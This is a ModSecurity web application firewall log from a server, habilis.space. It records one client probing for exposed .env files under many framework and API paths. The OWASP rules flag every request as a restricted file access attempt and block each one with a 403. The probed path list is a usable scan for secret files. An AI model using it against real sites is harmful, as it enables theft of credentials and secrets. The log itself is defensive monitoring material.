[Mon May 11 17:33:40.802526 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/prestashop/.env"] [unique_id "agH21DJnyuKVXoStDhbNAQAAAEs"]
[Mon May 11 17:33:40.802749 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/prestashop/.env"] [unique_id "agH21DJnyuKVXoStDhbNAQAAAEs"]
[Mon May 11 17:33:40.802974 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbNAQAAAEs"]
[Mon May 11 17:33:40.916890 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/codeigniter/.env"] [unique_id "agH21DJnyuKVXoStDhbNAgAAAEs"]
[Mon May 11 17:33:40.917114 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/codeigniter/.env"] [unique_id "agH21DJnyuKVXoStDhbNAgAAAEs"]
[Mon May 11 17:33:40.917356 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21DJnyuKVXoStDhbNAgAAAEs"]
[Mon May 11 17:33:41.032920 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/cakephp/.env"] [unique_id "agH21TJnyuKVXoStDhbNAwAAAEs"]
[Mon May 11 17:33:41.033145 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/cakephp/.env"] [unique_id "agH21TJnyuKVXoStDhbNAwAAAEs"]
[Mon May 11 17:33:41.033400 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNAwAAAEs"]
[Mon May 11 17:33:41.151239 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/zend/.env"] [unique_id "agH21TJnyuKVXoStDhbNBAAAAEs"]
[Mon May 11 17:33:41.151505 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/zend/.env"] [unique_id "agH21TJnyuKVXoStDhbNBAAAAEs"]
[Mon May 11 17:33:41.151713 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNBAAAAEs"]
[Mon May 11 17:33:41.323697 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/yii/.env"] [unique_id "agH21TJnyuKVXoStDhbNBQAAAEs"]
[Mon May 11 17:33:41.323920 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/yii/.env"] [unique_id "agH21TJnyuKVXoStDhbNBQAAAEs"]
[Mon May 11 17:33:41.324170 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNBQAAAEs"]
[Mon May 11 17:33:41.439586 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/laravel5/.env"] [unique_id "agH21TJnyuKVXoStDhbNBwAAAEs"]
[Mon May 11 17:33:41.439837 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/laravel5/.env"] [unique_id "agH21TJnyuKVXoStDhbNBwAAAEs"]
[Mon May 11 17:33:41.440063 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNBwAAAEs"]
[Mon May 11 17:33:41.635071 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/v1/.env"] [unique_id "agH21TJnyuKVXoStDhbNCAAAAEs"]
[Mon May 11 17:33:41.635335 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/v1/.env"] [unique_id "agH21TJnyuKVXoStDhbNCAAAAEs"]
[Mon May 11 17:33:41.635631 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNCAAAAEs"]
[Mon May 11 17:33:41.756617 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/v2/.env"] [unique_id "agH21TJnyuKVXoStDhbNCQAAAEs"]
[Mon May 11 17:33:41.756844 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/v2/.env"] [unique_id "agH21TJnyuKVXoStDhbNCQAAAEs"]
[Mon May 11 17:33:41.757067 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNCQAAAEs"]
[Mon May 11 17:33:41.871371 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/v3/.env"] [unique_id "agH21TJnyuKVXoStDhbNCgAAAEs"]
[Mon May 11 17:33:41.871598 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/v3/.env"] [unique_id "agH21TJnyuKVXoStDhbNCgAAAEs"]
[Mon May 11 17:33:41.871830 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21TJnyuKVXoStDhbNCgAAAEs"]
[Mon May 11 17:33:42.033769 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/v1/.env"] [unique_id "agH21jJnyuKVXoStDhbNCwAAAEs"]
[Mon May 11 17:33:42.033989 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/v1/.env"] [unique_id "agH21jJnyuKVXoStDhbNCwAAAEs"]
[Mon May 11 17:33:42.034214 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNCwAAAEs"]
[Mon May 11 17:33:42.155272 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/api/v2/.env"] [unique_id "agH21jJnyuKVXoStDhbNDAAAAEs"]
[Mon May 11 17:33:42.155507 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/api/v2/.env"] [unique_id "agH21jJnyuKVXoStDhbNDAAAAEs"]
[Mon May 11 17:33:42.155741 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNDAAAAEs"]
[Mon May 11 17:33:42.274493 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/rest/.env"] [unique_id "agH21jJnyuKVXoStDhbNDQAAAEs"]
[Mon May 11 17:33:42.274723 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/rest/.env"] [unique_id "agH21jJnyuKVXoStDhbNDQAAAEs"]
[Mon May 11 17:33:42.274949 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNDQAAAEs"]
[Mon May 11 17:33:42.604487 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/graphql/.env"] [unique_id "agH21jJnyuKVXoStDhbNDgAAAEs"]
[Mon May 11 17:33:42.604704 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/graphql/.env"] [unique_id "agH21jJnyuKVXoStDhbNDgAAAEs"]
[Mon May 11 17:33:42.604927 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH21jJnyuKVXoStDhbNDgAAAEs"]
[Mon May 11 17:33:42.723601 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/gateway/.env"] [unique_id "agH21jJnyuKVXoStDhbNDwAAAEs"]
